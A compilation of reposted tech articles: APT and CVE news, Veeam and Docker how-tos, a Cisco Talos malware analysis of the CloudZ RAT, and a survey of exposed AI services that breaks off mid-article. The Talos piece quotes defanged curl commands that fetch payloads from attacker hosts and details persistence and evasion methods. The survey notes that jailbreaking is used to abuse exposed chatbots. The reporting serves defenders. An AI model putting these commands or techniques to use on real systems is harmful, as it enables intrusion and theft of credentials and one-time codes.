Tuesday, May 5, 2026

China-Linked UAT-8302 Targets Governments Using Shared APT Malware Across Regions

A sophisticated China-nexus advanced persistent threat (APT) group has been attributed to attacks targeting government entities in South America since at least late 2024 and government agencies in southeastern Europe in 2025.

The activity is being tracked by Cisco Talos under the moniker UAT-8302, with post-exploitation involving the deployment of custom-made malware families that have been put to use by other China-aligned hacking groups.

Notable among the malware families is a .NET-based backdoor dubbed NetDraft (aka NosyDoor), a C# variant of FINALDRAFT (aka Squidoor) that has been previously linked to threat clusters known as Ink Dragon, CL-STA-0049, Earth Alux, Jewelbug, and REF7707.

ESET is tracking the use of NosyDoor to a group it calls LongNosedGoblin. Interestingly, the same malware has also been deployed against Russian IT organizations by a threat actor referred to as Erudite Mogwai (aka Space Pirates and Webworm), per Russian cybersecurity company Solar, which has given it the name LuckyStrike Agent.

Some of the other tools utilized by UAT-8302 are as follows -

 "Malware deployed by UAT-8302 connects it to several previously publicly disclosed threat clusters, indicating a close operating relationship between them at the very least," Talos researchers Jungsoo An, Asheer Malhotra, and Brandon White said in a technical report published today.

"Overall, the various malicious artifacts deployed by UAT-8302 indicate that the group has access to tools used by other sophisticated APT actors, all of which have been assessed as China-nexus or Chinese-speaking by various third-party industry reports."

It's currently not known what initial access methods the adversary employs to break into target networks, but it's suspected to involve the tried-and-tested approach of weaponizing zero-day and N-day exploits in web applications.

Upon gaining a foothold, the attackers are known to conduct extensive reconnaissance to map out the network, run open-source tools like gogo to perform automated scanning, and move laterally across the environment. The attack chains culminate in the deployment of NetDraft, CloudSorcerer (version 3.0), and VShell.

UAT-8302 has also been observed using a Rust-based variant of SNOWLIGHT called SNOWRUST to download the VShell payload from a remote server and execute it. Besides using custom malware, the threat actor sets up alternative means of backdoor access using proxy and VPN tools like Stowaway and SoftEther VPN.

The findings underscore the trend of advanced collaboration tactics between multiple China-aligned groups.In October 2025, Trend Micro shed light on a phenomenon called Premier Pass-as-a-Service, where initial access obtained by Earth Estries is passed to Earth Naga for follow-on exploitation, clouding attrition efforts. This partnership is assessed to have existed since at least late 2023.

"Premier Pass-as-a-Service provides direct access to critical assets, reducing the time spent on reconnaissance, initial exploitation and lateral movement phases," Trend Micro said. "Although the full extent of this model is not yet known, the limited number of observed incidents, combined with the substantial risk of exposure such a service entails, suggests that access is likely restricted to a small circle of threat actors."



from The Hacker News https://ift.tt/Bxzc5Rn
via IFTTT

How to configure the Veeam High Availability Cluster – Part 1

Veeam Backup & Replication v13 adds High Availability for the backup server. Our latest guide covers the setup path, so you don’t hit dead ends mid-deploy.

Veeam Backup & Replication v13 introduces the High Availability Cluster for Linux-based backup servers, helping keep the backup infrastructure available if the primary Backup Server becomes unavailable. The feature uses two Veeam Software Appliances, a cluster DNS name, a virtual IP address, and configuration database synchronization between the primary and secondary nodes.

In this first part of the series, we’ll walk through the initial HA cluster configuration: checking the prerequisites, enabling High Availability on both appliances, creating the cluster in the Veeam Backup & Replication Console, and connecting to the new cluster endpoint.

Before starting the configuration, make sure both nodes meet the required conditions: the same Veeam version, proper forward and reverse DNS records, static IP addresses in the same subnet, and a Veeam Data Platform Premium license. Local repositories should not be used within the HA cluster.

Prerequisites

To configure a working Veeam High Availability Cluster, you need the following:

  • Linux-based Veeam Backup Server – the configuration of the HA cluster works only with the Linux appliance version of the Veeam Backup Server. A mixed cluster with Windows and Linux Backup Servers is not supported. If a Veeam appliance is already configured and in use in the backup infrastructure, you can deploy a new appliance to use as a secondary node. Keep in mind that local repositories cannot be used within the HA cluster.
  • Veeam version – both nodes must have the same Veeam version installed before creating the HA cluster.
  • Veeam Backup console – to manage the HA cluster, the Veeam console installed on a Windows machine is required.
  • DNS Server – the cluster, primary node and secondary node must be defined in the DNS records in both forward and reverse zones.
  • Layer 2 network – both nodes must reside in the same subnet (layer 2) to establish proper communication.
  • License – the Veeam Data Platform Premium License is required to create the HA cluster.

How Veeam High Availability cluster works

Once the HA cluster has been created, Veeam leverages a PostgreSQL function to establish which is the primary and which is the secondary node of the cluster. Then, the synchronization between the HA nodes takes place. Changes in the Veeam configuration are always written to the primary node first and then replicated to the secondary node.

 

wp-image-34047

 

If the secondary node goes offline for more than 10 minutes, a warning is displayed on the notification bar of the primary node and an email alert is sent to the address specified in the global email notification settings. Another email will be sent once the secondary nodes comes back online.

Upgrading the HA cluster

Veeam leverages the Veeam Updater service to upgrade the HA cluster. During the upgrade operation, the primary node is upgraded first then the updates are synchronized with the secondary node. Automatic updates on the secondary node are disabled.

Updates available in the secondary node are compared with the updates installed on the primary node, and then only the necessary updates  are installed on the secondary node.

Configure the Veeam High Availability cluster

Deploy two Veeam Software Appliances that will serve as primary and secondary node of the High Availability Cluster. The secondary node must be a new installation and cannot contain any existing backup data.

Enable High Availability

To create the HA cluster, you must submit a request to enable the High Availability on both servers. Using your preferred browser, access the Veeam Host Management at https://<IP_Address>:10443. Enter the correct credentials (veeamadmin in the example) and click Sign in.

 

wp-image-34049

 

Enter the MFA code, then click Sign in.

 

wp-image-34050

 

Go to Backup Infrastructure area and click the Submit Request in the High Availability section.

 

wp-image-34051

 

Click OK.

 

wp-image-34052

 

The request will now show a Waiting for approval status, pending approval by the Security Officer.

 

wp-image-34054

 

Login to the Veeam Host Management using the Security Officer credentials and click Sign in.

 

wp-image-34055

 

Enter the MFA code, then click Sign in.

 

wp-image-34056

 

Select the pending request and click Approve.

 

wp-image-34057

 

Once approved, exit Veeam Host Management.

 

wp-image-34058

 

If you login again using Backup Administrator credentials, the request will now be displayed as Request approved.

 

wp-image-34059

 

Repeat the same procedure for the secondary node.

 

Create the HA cluster

Using the Veeam Backup & Replication Console, access the primary node. In the Backup infrastructure area, go to Managed Servers > Linux. Right click the Veeam Backup Server and select Create HA cluster.

 

wp-image-34060

 

If the Create HA cluster option is not available, it means the Veeam Data Platform Premium License is not installed on the Backup Server.

 

wp-image-34061

 

Verify that the installed license is the Premium edition.

 

wp-image-34062

 

Enter the Cluster DNS name created in the DNS Server and the Virtual IP address. Click Next.

 

wp-image-34063

 

Select the Primary node IP address and type the Secondary node IP address. Specify the correct Credentials to use and click Next.

 

wp-image-34064

 

Click Continue.

 

wp-image-34065

 

Click Finish to start the initialization.

 

wp-image-34066

 

The Veeam High Availability Cluster is being created.

 

wp-image-34067

 

After the HA cluster has been created, you can easily identify the primary and secondary node.

 

wp-image-34068

 

Connect to the High Availability Cluster

Once the HA cluster has been created, you must access the infrastructure management by entering the DNS HA cluster name in the Veeam Console. Click Connect.

 

wp-image-34069

 

Click Yes to accept the certificate.

 

wp-image-34070

 

Enter the credentials and click Sign in.

 

wp-image-34071

 

The Veeam Backup & Replication v13 main dashboard.

 

wp-image-34072

 

With the Veeam Backup Server in HA mode, you have the opportunity to quickly recover the backup infrastructure functionality if anything goes wrong with the primary node.

Part 2 will cover the manual failover procedure and the configuration required to trigger the failover operation automatically using Veeam ONE.



from StarWind Blog https://ift.tt/8a7SxRU
via IFTTT

Generate Images Locally with Docker Model Runner and Open WebUI

We’ve all been there: you need to generate a few images for a project, you fire up an AI image service, and suddenly you’re wondering what happens to your prompts, how many credits you have left, or why that “safe content” filter rejected your perfectly reasonable request for a dragon wearing a business suit. What if you could skip all of that and run the whole thing on your own machine, with a slick chat UI on top?

That’s exactly what Docker Model Runner now makes possible. With a couple of commands you can pull an image-generation model, connect it to Open WebUI, and start generating images right from a chat interface fully local, fully private, fully yours.

Let’s build it. Your own private DALL-E, no cloud subscription required.

What You’ll Need

  • Docker Desktop (macOS) or Docker Engine (Linux)
  • ~8 GB of free RAM for a small model (more is better)
  • GPU: optional but highly recommended, NVIDIA (CUDA), Apple Silicon (MPS), or CPU fallback

If you can run docker model version without errors, you’re good to go.

How  Docker Model Runner works with Open WebUI

Before we dive in, here’s the big picture:

Generate image with Open WebUI fig 1

Docker Model Runner acts as the control plane. It downloads the model, manages the inference backend lifecycle, and exposes a 100% OpenAI-compatible API — including the POST /v1/images/generations endpoint that Open WebUI already knows how to talk to.

Step 1: Pull an Image Generation Model

Docker Model Runner uses a compact packaging format called DDUF (Diffusers Unified Format) to distribute image generation models through Docker Hub, just like any other OCI artifact.

Pull a model to get started:

docker model pull stable-diffusion

You can confirm it’s ready:

docker model inspect stable-diffusion
{
    "id": "sha256:5f60862074a4c585126288d08555e5ad9ef65044bf490ff3a64855fc84d06823",
    "tags": [
        "docker.io/ai/stable-diffusion:latest"
    ],
    "created": 1768470632,
    "config": {
        "format": "diffusers",
        "architecture": "diffusers",
        "size": "6.94GB",
        "diffusers": {
            "dduf_file": "stable-diffusion-xl-base-1.0-FP16.dduf",
            "layout": "dduf"
        }
    }
}

What’s happening under the hood? The model is stored locally as a DDUF file, a single-file format that bundles all the components of a diffusion model (text encoder, VAE, UNet/DiT, scheduler config) into one portable artifact. Docker Model Runner knows how to unpack it at runtime.

Step 2: Launch Open WebUI

This is a magic trick. Docker Model Runner has a built-in launch command that knows exactly how to wire up Open WebUI against the local inference endpoint:

docker model launch openwebui

That’s it. Behind the scenes this runs:

docker run --rm \
  -p 3000:8080 \
  -e OPENAI_API_BASE=http://model-runner.docker.internal/engines/v1 \
  -e OPENAI_BASE_URL=http://model-runner.docker.internal/engines/v1 \
  -e OPENAI_API_KEY=sk-docker-model-runner \
  ghcr.io/open-webui/open-webui:latest

The model-runner.docker.internal hostname is a special DNS entry that Docker Desktop containers use to reach the Model Runner running on the host, no port-forwarding gymnastics required. If you use Docker CE, you’ll see the docker/model-runner container address instead of model-runner.docker.internal.

Open your browser at http://localhost:3000, create a local account (it stays offline), and you’ll land on the chat interface.

Tip: Want to run it in the background? Add –detach:

docker model launch openwebui --detach

Prefer Docker Compose? See the full setup here: https://docs.docker.com/ai/model-runner/openwebui-integration/

Step 3: Configure Open WebUI for Image Generation

Open WebUI already uses Docker Model Runner for text chat automatically (it reads the OPENAI_API_BASE env var). For image generation you need to point it at the images endpoint too, a 30-second job in the settings UI.

  1. Got to http://localhost:3000/admin/settings/images
  2. Enable Image Generation
  3. Fill in the fields:
  4. Click Save.

Field

Value

Model

stable-diffusion

API Base URL

http://model-runner.docker.internal/engines/diffusers/v1

API Key

whatever-you-want

Why the dummy API key? Docker Model Runner doesn’t require authentication, it’s a local service. The key is only there because Open WebUI’s form requires one. Any non-empty string works.

Step 4: Pull a Chat Model

Open WebUI is also a full-featured chat interface, and one of its best tricks is letting you ask the LLM to generate an image right from the conversation. For that to work, you need a language model too.

# Lightweight option — runs on almost any machine
docker model pull smollm2

# Recommended — more capable, better at understanding creative prompts
docker model pull gpt-oss

Both will show up automatically in the Open WebUI model selector. Use smollm2 if you’re tight on RAM, or gpt-oss if you want richer, more creative responses before image generation.

No extra configuration needed, Open WebUI picks up text models from the same OPENAI_API_BASE endpoint it was already configured with.

Step 5: Generate Your First Image

Head back to the main chat view. You’ll notice a small image icon in the message input bar.

Generate image with Open WebUI fig 2

Click it to toggle image generation mode, type your prompt, and send.

Try something like:

Create an image of a whale.

The first request takes a little longer while the backend loads the model into memory. After that, subsequent images generate much faster.

Generate image with Open WebUI fig 3


Open WebUI will automatically route image-generation requests to the diffusers backend and text requests to the language model, seamlessly, in the same conversation.

Step 6: Generate Images Directly via the API

For developers who want to integrate image generation into their own apps, Docker Model Runner exposes the standard OpenAI Images API directly:

curl -s -X POST http://localhost:12434/engines/diffusers/v1/images/generations \
  -H "Content-Type: application/json" \
  -d '{
    "model": "stable-diffusion",
    "prompt": "A cat sitting on a couch",
    "size": "512x512"
  }'

The response follows the OpenAI Images API format exactly:

{
  "created": 1742990400,
  "data": [
    {
      "b64_json": "/9j/4AAQSkZJRgABAQAAAQABAAD/2wBD..."
    }
  ]
}

Decode and save the image:

curl -s -X POST http://localhost:12434/engines/diffusers/v1/images/generations \
  -H "Content-Type: application/json" \
  -d '{
    "model": "stable-diffusion",
    "prompt": "A cat sitting on a couch",
    "size": "512x512"
  }' | jq -r '.data[0].b64_json' | base64 -d > cat.png


open cat.png

Advanced Parameters

The API supports all the parameters you’d expect from a full diffusers pipeline:

curl http://localhost:12434/engines/diffusers/v1/images/generations \
  -X POST \
  -H "Content-Type: application/json" \
  -d '{
    "model": "stable-diffusion",
    "prompt": "A serene Japanese zen garden, cherry blossoms, koi pond, photorealistic",
    "negative_prompt": "blurry, low quality, distorted, watermark",
    "size": "768x512",
    "n": 2,
    "num_inference_steps": 30,
    "guidance_scale": 7.5,
    "seed": 42,
    "response_format": "b64_json"
  }'| jq -r '.data[0].b64_json' | base64 -d > garden.png

Parameter

What it does

prompt

What you want in the image

negative_prompt

What you want to avoid

size

Resolution as WIDTHxHEIGHT (e.g., 512×512, 768×512)

n

Number of images to generate (1–10)

num_inference_steps

More steps = higher quality, slower (default: 50)

guidance_scale

How closely to follow the prompt (1–20, default: 7.5)

seed

Integer for reproducible results; omit for random

Pro tip: Set a seed while you’re iterating on a prompt. Once you’re happy with the composition, remove it to get unique variations.

Under the Hood: How the Diffusers Backend Works

When you first request an image, Docker Model Runner:

  1. Unpacks the DDUF file: extracts the model components and loads them via DiffusionPipeline.from_pretrained()
  2. Starts a FastAPI server: this is the server that Open WebUI and your curl commands talk to through Docker Model Runner

The server is installed on first use by downloading a self-contained Python environment from Docker Hub (version-pinned, so updates are explicit). It lives at ~/.docker/model-runner/diffusers/ — no Python version conflicts, no virtualenv setup.

Troubleshooting

The model takes forever to load on first use. That’s normal, the model weights are being loaded from disk and transferred to GPU memory. Subsequent requests in the same session are much faster because the backend stays warm.

I get a “No model loaded” 503 error Make sure the model is fully downloaded (docker model list) and that you’re sending the correct model name in the model field.

Image quality is poor / generations are too fast Increase num_inference_steps (try 20–50 steps). Higher values = slower but sharper results.

Open WebUI can’t connect to the image endpoint Double-check the URL in Admin Panel → Settings → Images. Inside a Docker container it must be http://model-runner.docker.internal/engines/diffusers/v1, not localhost.

Conclusion and What’s Next

Docker Model Runner makes local image generation simple. It packages and serves image models through an OpenAI-compatible API, while Open WebUI provides an easy chat interface on top. Together, they let you generate images privately on your own machine, either through the browser or directly through the API, without relying on a cloud service.

This feature opens up a lot of possibilities:

  • Multimodal workflows: Chat with a text model about an idea, then immediately generate an image of it — in the same Open WebUI conversation
  • RAG + image generation: Build a pipeline that generates illustrations for your documents
  • Custom models: The diffusers backend supports any DDUF-packaged model, so you can package your own fine-tuned models using Docker’s model packaging tools

The Docker Model Runner team is actively expanding model support on Docker Hub. Check docker model search for the latest available models.



from Docker https://ift.tt/KtAwd7J
via IFTTT

MetInfo CMS CVE-2026-29014 Exploited for Remote Code Execution Attacks

Threat actors are actively exploiting a critical security flaw impacting an open-source content management system (CMS) known as MetInfo, according to new findings from VulnCheck.

The vulnerability in question is CVE-2026-29014 (CVSS score: 9.8), a code injection flaw that could result in arbitrary code execution.

"MetInfo CMS versions 7.9, 8.0, and 8.1 contain an unauthenticated PHP code injection vulnerability that allows remote attackers to execute arbitrary code by sending crafted requests with malicious PHP code," the NIST National Vulnerability Database (NVD) states.

"Attackers can exploit insufficient input neutralization in the execution path to achieve remote code execution and gain full control over the affected server."

Per security researcher Egidio Romano, who discovered the vulnerability, the problem is rooted in the "/app/system/weixin/include/class/weixinreply.class.php" script, and stems from a lack of adequate sanitization of user-supplied input when issuing Weixin (aka WeChat) API requests.

As a result, remote, unauthenticated attackers could exploit this loophole to inject and execute arbitrary PHP code. One key prerequisite for successful exploitation when MetInfo is running on non-Windows servers is that the "/cache/weixin/" directory has to exist beforehand.The directory is created when installing and configuring the official WeChat plugin. 

Patches for CVE-2026-29014 were released by MetInfo on April 7, 2026. The vulnerability has since come under exploitation as of April 25, with a "small number of exploits" deployed against susceptible honeypots located in the U.S. and Singapore.

Although these efforts were initially sparse and associated with automated probing, the activity witnessed a surge on May 1, 2026, focusing on China and Hong Kong IP addresses, Caitlin Condon, vice president of security research at VulnCheck, said. As many as 2,000 instances of MetInfo CMS are accessible online, most of which are in China.



from The Hacker News https://ift.tt/jdylYz0
via IFTTT

CloudZ RAT potentially steals OTP messages using Pheno plugin

  • Cisco Talos discovered an intrusion, active since at least January 2026, where an unknown attacker implanted a CloudZ remote access tool (RAT) and a previously undocumented plugin called “Pheno.”
  • According to the functionalities of the CloudZ RAT and Pheno plugin, this was with the intention of stealing victims’ credentials and potentially one-time passwords (OTPs). 
  • CloudZ utilizes the custom Pheno plugin to hijack the established PC-to-phone bridge by abusing the Microsoft Phone Link application, allowing the plugin to continuously scan for active Phone Link processes and potentially intercept sensitive mobile data like SMS and OTPs without deploying malware on the phone. 
  • CloudZ evades detection by executing critical malicious functions dynamically in system memory and performing checks to avoid debuggers and sandbox environments. 

Attacker abuses the Windows Phone Link application 

CloudZ RAT potentially steals OTP messages using Pheno plugin

Windows Phone Link (formerly "Your Phone") is a synchronization tool developed by Microsoft and built directly into Windows 10 and 11 that bridges a PC and a smartphone (Android or iPhone). By establishing a secure connection via Wi-Fi and Bluetooth, the application mirrors essential phone activities (such as application notifications and SMS messages) onto the computer screen, reducing the user’s need to physically interact with the mobile device while working on the computer. The Phone Link application writes synchronized phone data such as SMS messages, call logs, and the application notification history to the Windows PC in the application’s SQLite database file. 

Talos observed that during an intrusion, an attacker attempted to abuse the Windows Phone Link application using the CloudZ RAT and its Pheno plugin. The Pheno plugin is designed to monitor an active PC-to-phone bridge established by the Phone Link application on the victim machine. With a confirmed Phone Link activity on the victim's machine, the attacker using the CloudZ RAT can potentially intercept the Phone Link application’s SQLite database file (e.g., “PhoneExperiences-*.db”) on the victim machine, potentially compromising SMS-based OTP messages and other authenticator application notification messages. 

Intrusion summary of CloudZ infection 

Talos discovered from telemetry data that the intrusion had begun with an unknown initial access vector to the victim's environment, which led to the execution of a fake ScreenConnect application update executable. This malicious executable drop and executes an intermediate .NET loader executable, which subsequently deploys the modular CloudZ on the victim’s machine. Upon execution, the RAT decrypts its configuration data, establishes an encrypted socket connection to the command-and-control (C2) server, and enters its command dispatcher mode.   

CloudZ facilitates the C2 commands to exfiltrate credentials from the victim machine browser data, and it downloads and implants a plugin. The plugin performs reconnaissance of the Microsoft Phone Link application on the victim machine and writes the reconnaissance data to an output file in a staging folder. CloudZ reads back the Phone Link application data from the staging folder and sends it to the C2 server. 

Rust-compiled executable used as a dropper 

Talos discovered a Rust-compiled 64-bit executable, disguised with file names such as “systemupdates.exe” or “Windows-interactive-update.exe”, functioning as a loader. The malicious loader was compiled on Jan. 1, 2026, and has the developer string of rustextractor.pdb

When the loader is run on the victim machine, it decrypts and drops an embedded .NET loader binary disguised as a text file with the file names “update.txt” or “msupdate.txt” in the folder “C:\ProgramData\Microsoft\windosDoc\”. 

CloudZ RAT potentially steals OTP messages using Pheno plugin
Figure 1. Excerpt of rusty dropper code.

In another instance, Talos observed that the .NET loader was implanted in the victim machine by downloading it from an attacker-controlled staging server using the command shown below:  

curl -L -o C:\ProgramData\Microsoft\WindowsDoc\update[.]txt hxxps[://]calm-wildflower-1349[.]hellohiall[.]workers[.]dev

The dropper executes an embedded PowerShell script to establish persistence on the victim machine through a Windows task which executes the dropped malicious .NET loader. The PowerShell script achieves it by initially performing a runtime check to determine whether the dropped .NET loader is already active on the system. It queries all running processes using the Get-CimInstance Win32_Process command and filters for any instance of regasm.exe with the command line parameters that include the string update.txt. If such an instance is found, the script silently exits without taking any action. 

If the check indicates that the .NET loader is not running, the script proceeds to establish persistence by creating a scheduled task named SystemWindowsApis in the scheduled task folder \Microsoft\Windows\. It configures the task to trigger at system startup /sc onstart, execute under the SYSTEM account /ru SYSTEM with the highest privilege level /rl HIGHEST, and the /f flag ensures it will silently overwrite any existing task with the same name, allowing the malware to update its persistence mechanism. The script configures the task scheduler action to run the .NET loader by utilizing the living-off-the-land binary (LOLBin) regasm.exe, which is the .NET Framework Assembly Registration Utility located at “C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\”. It provides the path of the dropped .NET loader as the argument to regasm.exe with the /nologo flag. After creating the task, the script immediately triggers it with schtasks /run, ensuring it executes immediately and survives future reboots. 

CloudZ RAT potentially steals OTP messages using Pheno plugin
Figure 2. Excerpt of the PowerShell script to establish persistence on victim machines. 

.NET loader implants the CloudZ RAT 

Talos found that the attacker embedded CloudZ, an encrypted .NET-compiled RAT, in the .NET loader executable. 

When the .NET loader is triggered through the Windows task scheduler, it performs the detection evasion checks beginning with a timing-based evasion check, where it calculates the actual elapsed time of a sleep command to detect if it is executed in the analysis environment. It then performs enumeration of running processes in the victim machine against a list of security tools, including network sniffers like Wireshark and Fiddler, as well as system monitors like Procmon and Sysmon. The .NET loader exits the execution if these are detected in the victim environment. 

CloudZ RAT potentially steals OTP messages using Pheno plugin
Figure 3. Excerpt of the .NET loader binary with detection evasion instructions.

The loader then conducts hardware and environment checks to identify virtual machine (VM) or sandbox characteristics. It verifies that the system has at least two processor cores and searches for strings like “VIRTUAL” or “SANDBOX” within the system directory path, computer name, user domain, and the current victim username.  

CloudZ RAT potentially steals OTP messages using Pheno plugin
Figure 4. Excerpt of the .NET loader binary with detection evasion instructions. 

The loader executable is embedded with multiple chunks of the hexadecimal strings in the binary, which are concatenated sequentially during the execution, reassembling a massive hexadecimal data blob. The loader converts the hexadecimal strings to bytes and performs bytewise XOR decryption using the key hexadecimal (0xCA). If the decrypted payload is a .NET assembly, the loader will reflectively run. Otherwise, it writes the decrypted payload to the folder “%TEMP%\{GUID}” and runs it as a process.  

CloudZ RAT potentially steals OTP messages using Pheno plugin
Figure 5. Excerpt of the .NET loader to execute the .NET payload module. 
CloudZ RAT potentially steals OTP messages using Pheno plugin
Figure 6. Excerpt of the .NET loader to execute the non .NET payload executables. 

Modular CloudZ RAT delivered as payload 

Talos discovered that a CloudZ, a modular RAT, is delivered as the payload in the current intrusion. CloudZ is a .NET executable compiled on Jan. 13, 2026, and is obfuscated with ConfuserEx obfuscation.  

CloudZ RAT potentially steals OTP messages using Pheno plugin
Figure 7. The RAT binary shows the malware name, CloudZ. 

CloudZ employs layers of defense against the analysis environments and reverse engineering. It queries the _ENABLE_PROFILING environment variable via GetEnvironmentVariable Windows API to detect whether a .NET profiler or debugger is attached to the RAT process on the victim machine. It uses the .NET method “System.Reflection.Emit.DynamicMethod” combined with “ILGenerator” method to create the executable functions dynamically during the RAT execution. 

The operation of CloudZ utilizes its configuration data, which is embedded in the binary, as a resource that it decrypts and loads into memory during execution. The decrypted configuration data includes various C2 commands, PowerShell scripts for data archive extraction, multiple file download methods, paths and names of staging folders, multiple HTTP headers, and the URLs of the staging servers. 

CloudZ RAT potentially steals OTP messages using Pheno plugin
Figure 7. CloudZ primary configuration data decrypted in memory. 

After the decryption of the configuration data, CloudZ decodes the Base64-encoded strings to get the URL of the staging server where the secondary configuration is stored.  

CloudZ RAT potentially steals OTP messages using Pheno plugin
Figure 8. CloudZ function that downloads the secondary configuration data from the staging server. 

Talos found that the RAT downloads and processes secondary configuration data through the URLs “hxxps[://]round-cherry-4418[.]hellohiall[.]workers[.]dev/?t=1773406370” or "https[://]pastebin[.]com/raw/8pYAgF0Z?t=1771833517" and extracts the C2 server IP address “185[.]196[.]10[.]136” and port number 8089, establishing connections through TCP sockets. 

Pivoting on the Pastebin URL indicator, we found that the attacker used the Pastebin handler name “HELLOHIALL” and hosted the secondary configuration data at several Pastebin URLs.  

CloudZ RAT potentially steals OTP messages using Pheno plugin
Figure 9. Attacker-controlled Pastebin hosting the secondary configuration data.
CloudZ RAT potentially steals OTP messages using Pheno plugin
Figure 10. Attacker’s Pastebin account hosting multiple nodes of secondary configuration data. 

The RAT rotates between three hardcoded user-agent strings to blend its HTTP traffic with the legitimate browser requests of the victim machine. Every HTTP request includes anti-caching headers consisting of “Cache-Control: no-cache, no-store, must-revalidate", “Pragma: no-cache", and “Expires: 0”, which prevents intermediate proxies and CDN infrastructure from caching C2 or the staging server details.  

User-agent headers used by the CloudZ are: 

  • Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 
  • Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 
  • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 

After the RAT establishes the C2 connection, it enters the command dispatcher module that relies on a decrypted configuration data loaded into memory. The configuration data contains Base64-encoded command identifiers which the RAT matches against the commands received from the C2 server to perform the several functionalities. The commands facilitated by CloudZ are shown in the table below: 

Base64-encoded command 

Decoded command 

Purpose 

cG9uZw== 

pong 

Heartbeat response 

UElORyE= 

PING! 

Heartbeat request 

Q0xPU0U= 

CLOSE 

Terminate RAT process 

SU5GTw== 

INFO 

collects OS edition, architecture, and hardware details from the victim machine 

UnVuU2hlbGw= 

RunShell 

Execute shell command 

QnJvd3NlclNlYXJjaA== 

BrowserSearch 

Browser data exfiltration 

R2V0V2lkZ2V0TG9n 

GetWidgetLog 

Phone Link recon logs and data exfiltration 

cGx1Z2lu 

plugin 

Load plugin 

c2F2ZVBsdWdpbg== 

savePlugin 

Save plugin to disk at the staging directory C:\ProgramData\Microsoft\whealth\ 

c2VuZFBsdWdpbg== 

sendPlugin 

Upload Plugin to C2 

UmVtb3ZlUGx1Z2lucw== 

RemovePlugins 

Remove all deployed plugin modules 

UmVjb3Zlcnk= 

Recovery 

Recovery or reconnect routine 

RFc= 

DW 

Download and write file operations 

Rk0= 

FM 

File management operations  deletefile 

TE4= 

LN 

Unknown 

TXNn 

Msg 

Send message to C2 

RXJyb3I= 

Error 

Error reporting back to C2 

cmVj 

rec 

Screen recording 

The RAT employs various methods to download and execute the plugins. The plugin download feature of RAT uses a three-method fallback approach. It first checks for the presence of the curl utility. If found, it attempts to download the file from a specified URL to a target path while following redirects. If curl is missing or the command fails, it falls back to PowerShell, where it first tries to download the file using the Invoke-WebRequest command. If that method also fails, it executes a final method that uses the LOLBin“bitsadmin” tool to download and save the plugin payloads to the victim machine.  

CloudZ RAT potentially steals OTP messages using Pheno plugin
Figure 11. CloudZ’s embedded PowerShell command with three different approaches to download operation.

Talos observed from the telemetry data that the attacker has downloaded and implanted the Pheno plugin through the curl command from the staging server. 

curl -L -o C:\Windows\TEMP\pheno.exe hxxps[://]orange-cell-1353[.]hellohiall[.]workers[.]dev/pheno.exe

Pheno plugin to perform the Phone Link application recon 

In this intrusion, Talos observed that the attacker used a plugin called Pheno to perform reconnaissance of the Windows Phone Link application in the victim machine.  

Pheno is designed to detect if a user is currently syncing their mobile device to a Windows machine through the Phone Link application. It scans all running processes for specific keywords such as "YourPhone," "PhoneExperienceHost," or "Link to Windows," and if matches are found, it logs their Process IDs and file paths to the files with the filename “phonelink-<COMPUTERNAME>.txt”, created in two staging folders such as : 

  •  C:\programdata\Microsoft\feedback\cm 
  •  %TEMP%\Microsoft\feedback\cm 
CloudZ RAT potentially steals OTP messages using Pheno plugin
Figure 11. Pheno recon plugin that monitors an active PC-to-phone bridge through Phone Link application. 

After checking Phone Link processes and writing its results, Pheno executes a secondary check that reads back the contents of previously written files and searches the keyword "proxy" in a case-insensitive manner. The plugin conducts this check because the Microsoft Phone Link application creates a local proxy connection to relay traffic between the PC and the paired mobile device. The presence of "proxy" in the output files, whether generated by a previous execution of the pheno plugin, indicates that the Phone Link session is actively routing traffic through its relay channel.  

When the keyword is detected, the pheno plugin writes "Maybe connected" to its output file in the staging folders, which eventually allows the attacker, with the help of CloudZ RAT, to potentially monitor SMS or OTP requests that appear on the Phone Link application. 

CloudZ RAT potentially steals OTP messages using Pheno plugin
Figure 12. Pheno checking for a previous instance of PC-to-phone bridge through Phone Link application. 

Coverage

The following ClamAV signature detects and blocks this threat: 

  • Win.Packed.Msilheracles-10030690-0 
  • Win.Trojan.CloudZRAT-10059935-0 
  • Win.Trojan.CloudZRAT-10059959-0 

The following Snort Rules (SIDs) detect and block this threat: 

  • Snort 2: 66409, 66410, 66408 
  • Snort 3: 301492, 66408 

Indicators of compromise (IOCs) 

The IOCs for this threat are available at our GitHub repository here.



from Cisco Talos Blog https://ift.tt/wMZeYEB
via IFTTT

We Scanned 1 Million Exposed AI Services. Here's How Bad the Security Actually Is

While the software industry has made genuine strides over the past few decades to deliver products securely, the furious pace of AI adoption is putting that progress at risk. Businesses are moving fast to self-host LLM infrastructure, drawn by the promise of AI as a force multiplier and the pressure to deliver more value faster. But speed is coming at the expense of security.

In the wake of the ClawdBot fiasco — the viral self-hosted AI assistant that’s averaging an eye-watering 2.6 CVEs per daythe Intruder team wanted to investigate how bad the security of AI infrastructure actually is.

To scope the attack surface, we used certificate transparency logs to pull just over 2 million hosts with 1 million exposed services. What we found wasn’t pretty. In fact, the AI infrastructure we scanned was more vulnerable, exposed, and misconfigured than any other software we've ever investigated.

No authentication by default

It didn’t take long to spot an alarming pattern: a significant number of hosts had been deployed straight out of the box, with no authentication in place. Looking into the source code revealed why: authentication simply isn't enabled by default in many of these projects. 

Real user data and company tooling were sitting exposed to anyone who looked. In the wrong hands, the consequences range from reputational damage to full compromise.

Here are some of the most striking examples of what was exposed.

Freely accessible chatbots

A number of instances involved chatbots that left user conversations exposed. One example, based on OpenUI, exposed a user's full LLM conversation history. It might seem relatively innocent on the surface, but chat histories in enterprise environments can reveal a lot.

More concerning were generic chatbots hosting a wide range of models — including multimodal LLMs — freely available to use. Malicious users can jailbreak most models to bypass safety guardrails for nefarious purposes — like generating illegal imagery, or soliciting advice with intent to commit a crime — and do so without fear of repercussion, since they're using someone else's infrastructure. This isn't hypothetical. People are finding creative ways to abuse company chatbots to access more capable models without paying or having requests logged to their own accounts.

There were also some questionable chatbots exposing large volumes of personal NSFW conversations. If that wasn't bad enough, the software running the Claude-powered goon-bots also disclosed their API keys in plaintext.

Wide open agent management platforms

